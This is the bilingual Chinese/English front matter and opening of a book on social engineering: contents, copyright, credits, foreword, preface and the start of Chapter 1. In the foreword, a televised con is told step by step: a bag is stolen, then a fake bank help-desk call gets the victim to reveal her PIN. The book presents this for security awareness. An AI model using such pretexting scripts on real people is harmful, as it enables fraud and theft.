封面

目录

Table of Contents

 

覆盖

Cover

 

封面

Title Page

 

版权

Copyright

 

奉献

Dedication

 

关于作者

About the Author

 

关于技术编辑

About the Technical Editor

 

致谢

Credits

 

前言

Foreword

 

前言和致谢

Preface and Acknowledgments

 

第 1 章:深入了解社会工程学的世界

Chapter 1: A Look into the World of Social Engineering

 

为什么这本书如此有价值

Why This Book Is So Valuable

 

社会工程学概述

Overview of Social Engineering

 

概括

Summary

 

第 2 章:信息收集

Chapter 2: Information Gathering

 

收集信息

Gathering Information

 

信息收集来源

Sources for Information Gathering

 

通信建模

Communication Modeling

 

沟通模式的力量

The Power of Communication Models

 

第 3 章:引诱

Chapter 3: Elicitation

 

什么是诱导?

What Is Elicitation?

 

引出的目标

The Goals of Elicitation

 

掌握诱导

Mastering Elicitation

 

概括

Summary

 

第 4 章 借口:如何成为任何人

Chapter 4: Pretexting: How to Become Anyone

 

什么是借口?

What Is Pretexting?

 

借口的原则和计划阶段

The Principles and Planning Stages of Pretexting

 

成功的借口

Successful Pretexting

 

概括

Summary

 

第 5 章:心理技巧:社会工程学中使用的心理学原理

Chapter 5: Mind Tricks: Psychological Principles Used in Social Engineering

 

思维模式

Modes of Thinking

 

微表情

Microexpressions

 

神经语言程序设计 (NLP)

Neurolinguistic Programming (NLP)

 

面谈和审讯

Interview and Interrogation

 

建立即时融洽关系

Building Instant Rapport

 

人为缓冲区溢出

The Human Buffer Overflow

 

概括

Summary

 

第六章 影响力:说服的力量

Chapter 6: Influence: The Power of Persuasion

 

影响力和说服力的五个基本原则

The Five Fundamentals of Influence and Persuasion

 

影响策略

Influence Tactics

 

改变现实:框架

Altering Reality: Framing

 

操纵:控制你的目标

Manipulation: Controlling Your Target

 

社会工程学中的操纵

Manipulation in Social Engineering

 

概括

Summary

 

第七章:社会工程师的工具

Chapter 7: The Tools of the Social Engineer

 

物理工具

Physical Tools

 

在线信息收集工具

Online Information-Gathering Tools

 

概括

Summary

 

第 8 章:案例研究:剖析社会工程师

Chapter 8: Case Studies: Dissecting the Social Engineer

 

米特尼克案例研究 1:入侵 DMV

Mitnick Case Study 1: Hacking the DMV

 

米特尼克案例研究 2:入侵社会保障管理局

Mitnick Case Study 2: Hacking the Social Security Administration

 

Hadnagy案例研究1:过度自信的首席执行官

Hadnagy Case Study 1: The Overconfident CEO

 

Hadnagy 案例研究 2:主题公园丑闻

Hadnagy Case Study 2: The Theme Park Scandal

 

绝密案例研究 1:并非不可能完成的任务

Top-Secret Case Study 1: Mission Not Impossible

 

绝密案例研究 2:利用社交工程攻击黑客

Top-Secret Case Study 2: Social Engineering a Hacker

 

为什么案例研究很重要

Why Case Studies Are Important

 

概括

Summary

 

第九章:预防和缓解

Chapter 9: Prevention and Mitigation

 

学习识别社会工程攻击

Learning to Identify Social Engineering Attacks

 

创建个人安全意识文化

Creating a Personal Security Awareness Culture

 

意识到你被要求提供的信息的价值

Being Aware of the Value of the Information You Are Being Asked For

 

保持软件更新

Keeping Software Updated

 

开发脚本

Developing Scripts

 

从社会工程审计中学习

Learning from Social Engineering Audits

 

结束语

Concluding Remarks

 

概括

Summary

 

指数

Index

 
封面

社会工程学:人类黑客的艺术

Social Engineering: The Art of Human Hacking

 

由...出版

Published by

 

威利出版有限公司

Wiley Publishing, Inc.

 

10475 Crosspoint 大道

10475 Crosspoint Boulevard

 

印第安纳波利斯,印第安纳州 46256

Indianapolis, IN 46256

 

www.wiley.com

www.wiley.com

 

版权所有 © 2011 Christopher Hadnagy

Copyright © 2011 by Christopher Hadnagy

 

由印第安纳州印第安纳波利斯的 Wiley Publishing, Inc. 出版

Published by Wiley Publishing, Inc., Indianapolis, Indiana

 

在加拿大同步出版

Published simultaneously in Canada

 

国际标准书号:978-0-470-63953-5

ISBN: 978-0-470-63953-5

 

ISBN: 978-1-118-02801-8(电子书籍)

ISBN: 978-1-118-02801-8 (ebk)

 

ISBN: 978-1-118-02971-8(电子书籍)

ISBN: 978-1-118-02971-8 (ebk)

 

ISBN: 978-1-118-02974-9 (电子书籍)

ISBN: 978-1-118-02974-9 (ebk)

 

美国制造

Manufactured in the United States of America

 

10 9 8 7 6 5 4 3 2 1

10 9 8 7 6 5 4 3 2 1

 

未经出版商事先书面许可,或未向版权许可中心(地址:222 Rosewood Drive, Danvers, MA 01923,电话:(978) 750-8400,传真:(978) 646-8600)支付相应的每份费用获得授权,不得以任何形式或通过任何手段(电子、机械、影印、录制、扫描或其他方式)复制、存储于检索系统或传输本出版物的任何部分,但 1976 年《美国版权法》第 107 或 108 条允许的除外。如需向出版商申请许可,请发送邮件至 John Wiley & Sons, Inc. 许可部门,地址:111 River Street, Hoboken, NJ 07030,电话:(201) 748-6011,传真:(201) 748-6008,或在线申请http://www.wiley.com/go/permissions

No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 646-8600. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at http://www.wiley.com/go/permissions.

 

责任限制/免责声明:出版商和作者不对本作品内容的准确性或完整性作出任何陈述或保证,并明确否认所有保证,包括但不限于适用于特定目的的保证。销售或宣传材料不得创建或延长任何保证。本文所含的建议和策略可能并不适合每种情况。出售本作品时,出版商不提供法律、会计或其他专业服务。如果需要专业帮助,应寻求有能力的专业人士的服务。出版商和作者均不对由此造成的损害负责。本作品中引用某个组织或网站作为引文和/或潜在进一步信息来源的事实并不意味着作者或出版商认可该组织或网站可能提供的信息或可能提出的建议。此外,读者应注意,本作品中列出的互联网网站可能在撰写本作品和阅读本作品之间发生变化或消失。

Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Web site is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or website may provide or recommendations it may make. Further, readers should be aware that Internet websites listed in this work may have changed or disappeared between when this work was written and when it is read.

 

有关我们其他产品和服务的一般信息,请联系我们美国境内的客户服务部门,电话:(877) 762-2974,美国境外的客户服务部门,电话:(317) 572-3993 或传真:(317) 572-4002。

For general information on our other products and services please contact our Customer Care Department within the United States at (877) 762-2974, outside the United States at (317) 572-3993 or fax (317) 572-4002.

 

Wiley 还以多种电子格式出版其书籍。一些印刷版内容可能无法在电子书中找到。

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic books.

 

国会图书馆控制编号: 2010937817

Library of Congress Control Number: 2010937817

 

商标: Wiley 和 Wiley 徽标是 John Wiley & Sons, Inc. 及其附属公司在美国和其他国家/地区的商标或注册商标,未经书面许可不得使用。所有其他商标均为其各自所有者的财产。Wiley Publishing, Inc. 与本书中提到的任何产品或供应商均无关联。

Trademarks: Wiley and the Wiley logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. All other trademarks are the property of their respective owners. Wiley Publishing, Inc. is not associated with any product or vendor mentioned in this book.

 

献给我美丽的妻子和美好的家庭;没有你们,这一切都不可能实现。马蒂,我无法用言语来表达我对你所做的一切的感激之情。

To my beautiful wife and my wonderful family; without you this would not have been possible. Mati, there are no words to describe the gratitude I feel for what you have done.

 

关于作者

About the Author

 

Christopher Hadnagy 是全球首个社交工程框架www.social-engineer.org的首席开发人员。在超过 14 年的安全和 IT 工作中,他与www.backtrack-linux.org团队合作,并参与了各种安全项目。他还担任 Offensive Security 渗透测试团队的培训师和首席社交工程师。

Christopher Hadnagy is the lead developer of www.social-engineer.org, the world’s first social engineering framework. In more than 14 years of security and IT activity, he has partnered with the team at www.backtrack-linux.org and worked on a wide variety of security projects. He also serves as trainer and lead social engineer for Offensive Security’s penetration testing team.

 

关于技术编辑

About the Technical Editor

 

Jim O'Gorman 是一名专业的渗透测试员和社会工程审计员,拥有超过 14 年的工作经验,曾为从小型 ISP 到财富 100 强企业等各种公司工作。Jim 是 Offensive Security Advanced Windows Exploitation 课程的联合培训师,该课程是最难的漏洞开发课程之一。作为www.social-engineer.org的创始成员,Jim 是教育公众了解社会工程威胁的权威。

Jim O’Gorman is a professional penetration tester and social engineering auditor with more than 14 years of experience working for companies ranging from small ISPs to Fortune 100 corporations. Jim is co-trainer of the Offensive Security Advanced Windows Exploitation class, one of the most difficult exploit development classes available. A founding member of www.social-engineer.org, Jim is an authority on educating the public about social engineering threats.

 

致谢

Credits

 

执行编辑

Executive Editor

 

卡罗尔·朗

Carol Long

 

项目编辑器

Project Editor

 

布赖恩·赫尔曼

Brian Herrmann

 

技术编辑

Technical Editor

 

吉姆·奥戈曼

Jim O’Gorman

 

制作编辑

Production Editor

 

凯瑟琳·维索尔

Kathleen Wisor

 

文字编辑

Copy Editor

 

保拉·洛厄尔

Paula Lowell

 

编辑总监

Editorial Director

 

罗宾·B·西斯基

Robyn B. Siesky

 

编辑经理

Editorial Manager

 

玛丽·贝思·韦克菲尔德

Mary Beth Wakefield

 

自由职业者编辑经理

Freelancer Editorial Manager

 

罗斯玛丽·格雷厄姆

Rosemarie Graham

 

市场经理

Marketing Manager

 

阿什利·祖尔彻

Ashley Zurcher

 

产品经理

Production Manager

 

蒂姆·泰特

Tim Tate

 

副总裁兼执行集团出版人

Vice President and Executive Group Publisher

 

理查德·斯沃德利

Richard Swadley

 

副总裁兼执行出版人

Vice President and Executive Publisher

 

巴里·普鲁埃特

Barry Pruett

 

联合 出版商

Associate Publisher

 

吉姆·米纳特尔

Jim Minatel

 

项目协调员,封面

Project Coordinator, Cover

 

林赛·斯坦福

Lynsey Stanford

 

合成器

Compositor

 

莫琳·福里斯(Maureen Forys),《Happenstance Type-O-Rama》

Maureen Forys, Happenstance Type-O-Rama

 

校对

Proofreader

 

Jen Larsen,Word One 纽约

Jen Larsen, Word One New York

 

索引器

Indexer

 

约翰娜·范胡斯·丁斯

Johnna VanHoose Dinse

 

封面图片

Cover Image

 

© Digital Vision/Getty Images

© Digital Vision/Getty Images

 

封面设计师

Cover Designer

 

瑞恩·斯尼德

Ryan Sneed

 

前言

Foreword

 

安全是一个两面性的难题。从内部看,我们寻求一种舒适感和保障感。从外部看,小偷、黑客和破坏者正在寻找漏洞。我们大多数人都认为我们的家是安全的,直到有一天,我们发现自己被锁在门外。突然间,我们的观点发生了变化,弱点很容易被发现。

Security is a puzzle with two sides. From the inside, we look for a sense of comfort and assurance. From the outside, thieves, hackers, and vandals are looking for gaps. Most of us believe our homes are safe until one day, we find ourselves locked out. Suddenly, our perspective shifts and weaknesses are easily found.

 

要完全理解任何类型的安全措施,我们必须走出围栏,本质上就是把自己锁在外面,然后开始寻找其他进入的方法。问题是,我们大多数人都对自己的信心视而不见,或者我们认为坚固的锁、厚重的门、高端的安全系统和警犬足以让大多数人望而却步,从而对潜在的问题视而不见。

To completely understand any kind of security it is essential to step outside of the fence, in essence locking ourselves out, and start looking for other ways in. The problem is that most of us are blinded to potential problems by our own confidence or our belief that strong locks, thick doors, a high-end security system, and a guard dog are more than enough to keep most people at bay.

 

我不是大多数人。在过去十年中,我实施的骗​​局比历史上任何人都多。我曾闯入赌场、伪造体育赛事、操纵拍卖、骗取人们最珍贵的财物,还闯过了看似无懈可击的安全措施。

I’m not most people. In the last ten years I have pulled more cons and scams than anyone in history. I’ve beaten casinos, faked sports events, fixed auctions, talked people out of their dearest possessions, and walked right past seemingly unbeatable levels of security.

 

我在一档名为《The Real Hustle》的热门电视节目中揭露了小偷、骗子、骗子和骗子的手段,以此谋生。如果我是一个真正的罪犯,我可能会变得富有、出名或死亡——可能三者兼而有之。我花了一生的时间研究各种形式的欺骗行为,以告诉公众他们实际上是多么脆弱。

I have made a living exposing the methods of thieves, liars, crooks, and con men on a hit TV show called The Real Hustle. If I’d been a real criminal I would probably be rich, famous, or dead—probably all three. I have used a lifetime of research into all forms of deception to teach the public just how vulnerable they really are.

 

每周,我都会和 Alexis Conran 一起对那些不知道自己被骗的真实人群实施真正的骗局。我们使用隐藏的摄像头向家中的观众展示可能发生的情况,以便他们能够识别相同的骗局。

Each week, along with Alexis Conran, I pull real scams on real people who have no idea they are being ripped off. Using hidden cameras, we show the audience at home what is possible so they can recognize the same scam.

 

这份不寻常的职业让我对罪犯的思维方式有了独特的理解。我成了披着狼皮的羊。我了解到,无论某件事看起来多么不可能,几乎总有一种巧妙、出乎意料的方法来解决问题。

This unusual career has resulted in a unique understanding of how criminals think. I’ve become a sheep in wolves’ clothing. I’ve learned that, no matter how impossible something might seem, there’s almost always a clever, unexpected way to solve the problem.

 

例如,我曾提出要演示如何轻而易举地偷走女人的钱包,甚至让她说出 ATM 或信用卡的 PIN 码。BBC 认为这根本不可能实现。当我们将此作为The Real Hustle的项目介绍时,BBC 专员在旁边写下“绝不会发生”并将其退回。我们知道这完全有可能,因为据报道,同一骗局有不同版本,在英国各地发生的几起巧妙的骗局中,盗窃受害者被骗透露了他们的 PIN 码。我们提取了不同骗局中的元素,以准确说明某人可能如何被骗,让其他人完全访问他们的银行账户。

An example of this is when I offered to show how easy it would be to not only steal a woman’s purse, but also to get her to tell me the PIN to her ATM or credit cards. The BBC didn’t think it was possible to accomplish this. When we presented this as an item for The Real Hustle, the BBC commissioner wrote “will never happen” beside it and sent it back. We knew it was entirely possible because different versions of the same scam had been reported, where victims of theft were talked into revealing their PINs in several clever scams around the UK. We took elements from different scams to illustrate exactly how someone might be duped into giving someone else complete access to their bank account.

 

为了证明我们的观点,我们在当地一家咖啡馆里设下骗局。这家咖啡馆位于伦敦牛津街一家商场的顶层。我穿着西装坐在一张空桌子旁,周围相对安静。我把公文包放在桌子上,等待合适的受害者。不一会儿,一位受害者和一位朋友来了,坐在我旁边的桌子旁,把包放在旁边的座位上。这可能是她的习惯,她把座位拉近,手一直放在包上。

To prove our point we set up the scam at a local cafe. The cafe was on the top floor of a mall on Oxford Street in London. It was relatively quiet as I sat at an empty table wearing a business suit. I placed my briefcase on the table and waited for a suitable victim. In a few moments, just such a victim arrived with a friend and sat at the table next to mine, placing her bag on the seat beside her. As was probably her habit, she pulled the seat close and kept her hand on the bag at all times.

 

我需要偷走整袋,但是,她的手放在袋子上,她的朋友坐在对面,她开始看起来很糟糕。但几分钟后,她的朋友就去找洗手间了。目标独自一人,所以我向亚历克斯和杰西发出了信号。

I needed to steal the entire bag, but, with her hand resting on it and her friend sitting opposite, she was beginning to look like bad news. But, after a few minutes, her friend left to find a restroom. The mark was alone so I gave Alex and Jess the signal.

 

亚历克斯和杰西扮演一对情侣,问目标人物是否愿意为他们俩拍一张照片。她很乐意这么做。她从包里拿出相机,拍下了这对“幸福的情侣”的照片,趁着我分心的时候,我漫不经心地伸手接过她的包,平静地把它锁在公文包里。当亚历克斯和杰西离开咖啡馆时,我的目标人物还没有注意到那把空椅子。一离开视线,亚历克斯就快步走向停车场。

Playing the part of a couple, Alex and Jess asked the mark if she would take a picture of them both. She was happy to do so. She removed her hand from her bag to take the camera and snap a picture of the “happy couple” and, while distracted, I casually reached over, took her bag, and calmly locked it inside my briefcase. My victim was yet to notice the empty chair as Alex and Jess left the cafe. Once out of sight, Alex headed quickly for the parking garage.

 

她很快就意识到自己的包不见了。她立刻开始惊慌失措。她站起来,惊慌失措地四处张望。这正是我们所希望的,所以我问她是否需要帮助。

It didn’t take long for her to realize her bag was gone. Instantly, she began to panic. She stood up and looked around, frantically. This was exactly what we were hoping for so, I asked her if she needed help.

 

她开始问我是否看到了什么。我告诉她我没有看到,但说服她坐下来想想包里有什么。一部手机。化妆品。一点现金。还有她的信用卡。宾果!

She started to ask me if I had seen anything. I told her I hadn’t but convinced her to sit down and think about what was in the bag. A phone. Make-up. A little cash. And her credit cards. Bingo!

 

我问她在哪家银行开户,然后告诉她我在那家银行工作。真是幸运!我向她保证一切都会好起来,但她需要立即取消信用卡。我拨打了“服务台”电话,实际上是亚历克斯打来的,然后把我的电话递给了她。她上钩了,现在就由亚历克斯来引诱她了。

I asked who she banked with and then told her that I worked for that bank. What a stroke of luck! I reassured her that everything would be fine but she would need to cancel her credit card right away. I called the “help-desk” number, which was actually Alex, and handed my phone to her. She was hooked and it was now up to Alex to reel her in.

 

亚历克斯在面包车的楼下。仪表板上的 CD 播放器正在播放我们从互联网上下载的办公室噪音。他让目标保持冷静,哄骗她,然后向她保证,她的卡可以很容易地取消,但为了验证她的身份,她需要在她使用的电话键盘上输入 PIN 码。

Alex was downstairs in the van. On the dashboard, a CD player was playing office noises we had downloaded from the Internet. He kept the mark calm, strung her along, and then assured her that her card could easily be canceled but, to verify her identity, she needed to enter her PIN on the keypad of the phone she was using.

 

我的手机和键盘。

My phone and my keypad.

 

剩下的事情你也能猜到。我们拿到她的 PIN 码后,我就把她留给她的朋友,然后朝门口走去。如果我们真的是小偷,我们可以通过 ATM 取款、芯片和 PIN 购买来访问她的账户。幸运的是,这只是一个电视节目,当我回来把包还给她并告诉她这一切都是假的骗局时,她非常高兴。她甚至感谢我把包还给她,我回答说:“不要谢谢我。是我偷了它。”

You can guess the rest. Once we had her PIN, I left her with her friend and headed for the door. If we were real thieves, we would have had access to her account via ATM withdrawals and chip and PIN purchases. Fortunately for her, it was just a TV show and she was so happy when I came back to return her bag and tell her it was all a fake scam. She even thanked me for giving her bag back to which I replied, “Don’t thank me. I’m the one who stole it.”

 

无论系统多么安全,总有办法突破。通常,系统中的人为因素最容易被操纵和欺骗。制造恐慌状态、使用影响力、操纵策略或引起信任感都是让受害者安心的方法。

No matter how secure a system is, there’s always a way to break through. Often, the human elements of the system are the easiest to manipulate and deceive. Creating a state of panic, using influence, manipulation tactics, or causing feelings of trust are all methods used to put a victim at ease.

 

这里概述的场景是一个极端的例子,但它表明,只要稍加创造力,就可以实现看似不可能的骗局。

The scenario outlined here is an extreme example, but it shows that, with a little creativity, seemingly impossible scams can be pulled off.

 

提高安全性的第一步就是承认系统存在漏洞,并且可能被攻破。相反,如果认为不可能被攻破,那么你就会像戴上眼罩一样全速前进。社会工程学旨在为你提供宝贵的见解,让你了解用于攻破看似安全的系统的方法,并揭露存在于最大的漏洞(即人)中的威胁。本书不是黑客指南——他们已经知道如何攻破系统,并且每天都在寻找新方法。相反,克里斯·哈德纳吉 (Chris Hadnagy) 为那些身处围墙内的人提供了一个从另一边,即黑暗的一面观察的机会,因为他揭露了世界上最恶毒的黑客、骗子和社会工程师的思维和方法。

The first step in becoming more secure is simply conceding that a system is vulnerable and can be compromised. On the contrary, by believing a breach is impossible, a blindfold is placed over your eyes as you run full speed ahead. Social Engineering is designed to provide you with invaluable insight into the methods used to break seemingly secure systems and expose the threats that exist in the largest vulnerability, the people. This book is not a guide for hackers—they already know how to break in and are finding new ways every day. Instead, Chris Hadnagy offers those inside the fence an opportunity to take a look from the other side, the dark side, as he exposes the thinking and methods of the world’s most malicious hackers, con men, and social engineers.

 

记住:筑墙的人和那些想越过、钻过、绕过或穿过墙的人的想法不同。正如我经常告诉我的听众,如果你认为自己不会被骗,那么你就是我想要认识的人。

Remember: those who build walls think differently than those who seek to go over, under, around, or through them. As I often tell my audiences, if you think you can’t be conned, you’re just the person I’d like to meet.

 

保罗·威尔逊

Paul Wilson

 

2010 年 10 月

October 2010

 

前言和致谢

Preface and Acknowledgments

 

就在几年前,我和朋友兼导师 Mati Aharoni 坐在一起,决定推出www.social-engineer.org。这个想法不断发展,直到它成为一个令人惊叹的网站,并得到了一些真正才华横溢的人的支持。没过多久,我就想出了把这些年的调查研究和经验写成一本书的想法。当我有这个想法时,我得到了压倒性的支持。话虽如此,一些具体的致谢对于这本书成为今天的样子非常重要。

It was just a few years ago that I was sitting with my friend and mentor, Mati Aharoni, deciding to launch www.social-engineer.org. The idea grew and grew until it became an amazing website supported by some truly brilliant people. It didn’t take long to come up with the idea to put those years of research and experience down into the pages of a book. When I had the idea, I was met with overwhelming support. That said, some specific acknowledgements are very important to how this book became what it is today.

 

我从很小的时候就对操纵别人很感兴趣。这并不是坏事,但我发现很有趣的是,我能够得到很多东西或处于不真实的境地。有一次,我和一位好朋友兼商业伙伴一起参加了纽约市贾维茨中心的一次技术会议。一家大公司租下了 FAO Schwarz 举办私人派对。当然,派对只接受邀请,我和我的朋友就像大池塘里的两条小鱼:派对是为惠普、微软等公司的首席执行官和高层管理人员举办的。我的朋友对我说:“参加那个派对真的很酷。”

From a very young age I was always interested in manipulating people. Not in a bad way, but I found it interesting how many times I was able to obtain things or be in situations that would be unreal. One time I was with a good friend and business associate at a tech conference at the Javits Center in New York City. A large corporation had rented FAO Schwarz for a private party. Of course, the party was by invitation only, and my friend and I were two small fish in a large pond: the party was for the CEOs and upper management of companies like HP, Microsoft, and the like. My friend said to me, “It would be really cool to get into that party.”

 

我只是回答说:“为什么不能呢?” 那时我心里想:“我知道只要问对路,我们就能进去 ” 于是我走向负责售票亭和客人名单的女士,和她们聊了几分钟。 在我和她们说话的时候,Linux 内核的创建者 Linus Torvalds 走了过来。 我在一个摊位上买了一个微软的毛绒玩具,我开玩笑地转向 Linus 说:“嘿,你想在我的微软玩具上签名吗?”

I simply responded, “Why can’t we?” At that point I thought to myself, “I know we can get in there if we just ask the right way.” So I approached the women in charge of the ticket booth and the guest list and I spoke to them for a few minutes. As I was speaking to them, Linus Torvalds, the creator of the Linux kernel, walked by. I had picked up a Microsoft plush toy at one of the booths and as I joke I turned to Linus and said, “Hey, you want to autograph my Microsoft toy?”

 

他听后哈哈大笑,一边拿票一边说:“干得好,年轻人。聚会上见。”

He got a good laugh out of it and as he grabbed his tickets he said, “Nice job, young man. I will see you at the party.”

 

我转身回到售票亭的负责人那里,她递给我两张 FAO Schwartz 内部专属派对的门票。

I turned back to the women in charge of the ticket booth and was handed two tickets to an exclusive party inside FAO Schwartz.

 

直到后来,我才开始分析这样的故事,当时有人开始称之为“哈德纳吉效应”。听起来很有趣,但我开始明白发生在我身上的很多事情并不是运气或命运,而是知道如何在正确的时间出现在我需要的地方。

It wasn’t until later in life that I began to analyze stories like this, after some started calling it “the Hadnagy Effect.” As funny as that sounds, I began to see that much of what occurred to me wasn’t luck or fate, but rather knowing how to be where I needed to be at the right time.

 

这并不意味着一路上没有付出辛勤的努力和很多帮助。我生命中的缪斯女神是我美丽的妻子。近二十年来,你一直支持我所有的想法和努力,你是我最好的朋友、我的知己和我的支柱。没有你,我就不会有今天的成就。此外,你还生下了地球上最漂亮的两个孩子。我的儿子和女儿是我继续做这一切的动力。如果我所做的任何事情都能让他们觉得这个地方更安全一点,或者教会他们如何保护自己,那么这一切都是值得的。

That doesn’t mean it didn’t take hard work and a lot of help along the way. My muse in life is my wonderful wife. For almost two decades you have supported me in all my ideas and efforts and you are my best friend, my confidant, and my support pillar. Without you I would not be where I am today. In addition, you have produced two of the most beautiful children on this planet. My son and my daughter are the motivation to keep doing all of this. If anything I do can make this place just a little more secure for them, or teach them how to keep themselves safe, it is all worthwhile.

 

对于我的儿子和女儿,我无法表达对你们的支持、爱和激励的感激之情。我希望我的儿子和我的小公主不必与这个世界上那些恶意的坏人打交道,但我知道这是多么不可能。希望这些信息能给你们俩带来一点安全感。

To my son and daughter, I cannot express enough gratitude for your support, love, and motivation. My hope is that my son and my little princess will not have to deal with the malicious, bad people out in this world, but I know just how unlikely that is. May this information keep you both just a little more secure.

 

Paul,又名 rAWjAW,感谢您对网站的所有支持。您作为“wiki 管理员”所花费的数千小时得到了回报,现在我们拥有了供全世界使用的精美资源。我知道我说的还不够,但“你被解雇了!”结合 Tom(又名 DigIp)的精美创作,该网站堪称一件艺术品。

Paul, aka rAWjAW, thanks for all your support on the website. The thousands of hours you spent as the “wiki-master” paid off and now we have a beautiful resource for the world to use. I know I don’t say it enough, but “you’re fired!” Combined with the beautiful creation of Tom, aka DigIp, the website is a work of art.

 

卡罗尔是我在 Wiley 的编辑,她拼尽全力把这篇文章整理好,并按照时间表进行。她出色地组织了一支优秀的团队,使这个想法成为现实。谢谢你。

Carol, my editor at Wiley, worked her butt off to get this organized and following some semblance of a timeline. She did an amazing job putting together a great team of people and making this idea a reality. Thank you.

 

布莱恩,我说的是真心话。当这一切结束后,我会想念你的。在过去的几个月里,我和你一起工作,我开始期待我的编辑课程和你将传授给我的知识。你诚实坦率的建议和建议使这本书比以前更好。

Brian, I meant what I said. I am going to miss you when this is over. As I worked with you over the last few months I began to look forward to my editing sessions and the knowledge you would lay on me. Your honest and frank counsel and advice made this book better than it was.

 

我还要感谢吉姆(又名埃尔伍德)。如果没有你, social-engineer.org以及本书中发生的很多事情,甚至过去几年我生活中发生的事情,都不可能成为现实。谢谢你让我保持谦逊和克制。你不断的现实检查帮助我保持专注并平衡我必须扮演的许多不同角色。谢谢你。

My gratitude goes out to Jim, aka Elwood, as well. Without you a lot of what has happened on social-engineer.org as well as inside this book, heck in my life in the last couple years, would not be a reality. Thank you for keeping me humble and in check. Your constant reality checks helped me stay focused and balance the many different roles I had to play. Thank you.

 

莉兹,大约十二年前,你告诉我应该写一本书。我相信你心里想的不是这个,但这就是我的想法。你帮助我度过了一段非常黑暗的时光。谢谢你,我爱你。

Liz, about twelve years ago you told me I should write a book. I am sure you had something different in mind, but here it is. You have helped me through some pretty dark times. Thank you and I love you.

 

Mati,我的导师,我的兄弟,如果没有你,我会怎样?Mati,你真的是我的导师和兄弟。我从心底感谢你相信我能写出这本书并推出www.social-engineer.org,而且两件事都会顺利。更重要的是,你不断的忠告和指导都体现在这本书中,让我超越了自己想象。

Mati, my mentor, and my achoti, where would I be without you? Mati, you truly are my mentor and my brother. Thank you from the bottom of my heart for having the faith in me that I could write this book and launch www.social-engineer.org and that both would be good. More than that, your constant counsel and direction have been translated on the pages of this book to make me more than I thought I could be.

 

您对 BackTrack 团队的支持以及www.offensive-security.com团队的支持超出了我的预期。感谢您帮助我平衡和确定优先事项。我的achoti,特别感谢您成为理性的声音,成为令人沮丧的日子结束时的光明。我衷心感谢您。

Your support with the BackTrack team along with the support of the team at www.offensive-security.com have transcended all I could have expected. Thank you for helping me balance and prioritize. My achoti, a special thanks to you for being the voice of reason and the light at the end of some frustrating days. With all my love I thank you.

 

我在这里提到的每个人都以某种方式为这本书做出了贡献。在他们的帮助、支持和热爱下,这本书成为了我引以为豪的作品。对于支持该网站、频道和我们的研究的其他人们,我表示感谢。

Each person I mentioned here contributed to this book in some fashion. With their help, support and love this book has become a work that I am proud to have my name on. For the rest of you who have supported the site, the channel, and our research, thank you.

 

当你阅读这本书时,我希望它能够对你产生影响,就如同它的写作对我产生影响一样。

As you read this book, I hope it affects you the way writing it has affected me.

 

爱因斯坦曾经说过:“信息不是知识。”这是一个很有力的想法。仅仅阅读这本书并不能将这些知识植入你的生命中。应用这些原则,实践这些书页中所教的内容,并将这些信息融入你的日常生活。当你这样做时,你就会看到这些知识发挥作用。

Albert Einstein once said, “Information is not knowledge.” That is a powerful thought. Just reading this book will not somehow implant this knowledge into your being. Apply the principles, practice what is taught in these pages, and make the information a part of your daily life. When you do, you will then see this knowledge take effect.

 

克里斯托弗·哈德纳吉

Christopher Hadnagy

 

2010 年 10 月

October 2010

 

第1章

Chapter 1

 

深入了解社会工程学的世界

A Look into the World of Social Engineering

 

了解敌人,了解自己,就不必害怕百战百胜的结果。

If you know the enemy and know yourself you need not fear the results of a hundred battles.

 

—孙子

—Sun Tzu

 

社会工程学 (SE) 在很大程度上被误解了,导致人们对社会工程学是什么以及它是如何运作的有着许多不同的看法。这导致了一种情况,有些人可能认为 SE 只是骗取披萨或性满足等琐碎的免费物品的谎言;其他人认为 SE 只是指罪犯或骗子使用的工具,或者认为它是一门科学,其理论可以分解成部分或方程式并进行研究。或者也许它是一种失传已久的神秘艺术,使从业者能够像魔术师或幻术师一样使用强大的心理技巧。

Social engineering (SE) has been largely misunderstood, leading to many differing opinions on what social engineering is and how it works. This has led to a situation where some may view SE as simply lying to scam trivial free items such as pizza or obtaining sexual gratification; others think SE just refers to the tools used by criminals or con men, or perhaps that it is a science whose theories can be broken down into parts or equations and studied. Or perhaps it’s a long-lost mystical art giving practitioners the ability to use powerful mind tricks like a magician or illusionist.

 

不管你属于哪个阵营,这本书都适合你。社会工程学每天都在日常情况下被人们使用。一个试图在糖果区占便宜的孩子或一个寻求加薪的员工都在使用社会工程学。社会工程学在政府或小型企业营销中很常见。不幸的是,当罪犯、骗子等诱骗人们泄露使他们容易受到犯罪攻击的信息时,也会使用社会工程学。像任何工具一样,社会工程学没有好坏之分,只是一种用途各异的工具。

In whatever camp your flag flies, this book is for you. Social engineering is used every day by everyday people in everyday situations. A child trying to get her way in the candy aisle or an employee looking for a raise is using social engineering. Social engineering happens in government or small business marketing. Unfortunately, it is also present when criminals, con men, and the like trick people into giving away information that makes them vulnerable to crimes. Like any tool, social engineering is not good or evil, but simply a tool that has many different uses.

 

请考虑以下一些问题来加深这一观点:

Consider some of these questions to drive that point home:

 
 
     
  • 您是否被委托确保公司尽可能的安全?
  • Have you been tasked to make sure your company is as secure as possible?
  •  
     
  • 您是一位阅读所有最新信息的安全爱好者吗?
  • Are you a security enthusiast who reads every bit of the latest information out there?
  •  
     
  • 您是受雇来测试客户安全性的专业渗透测试人员吗?
  • Are you a professional penetration tester who is hired to test the security of your clients?
  •  
     
  • 您是一名以 IT 专业为专业的大学生吗?
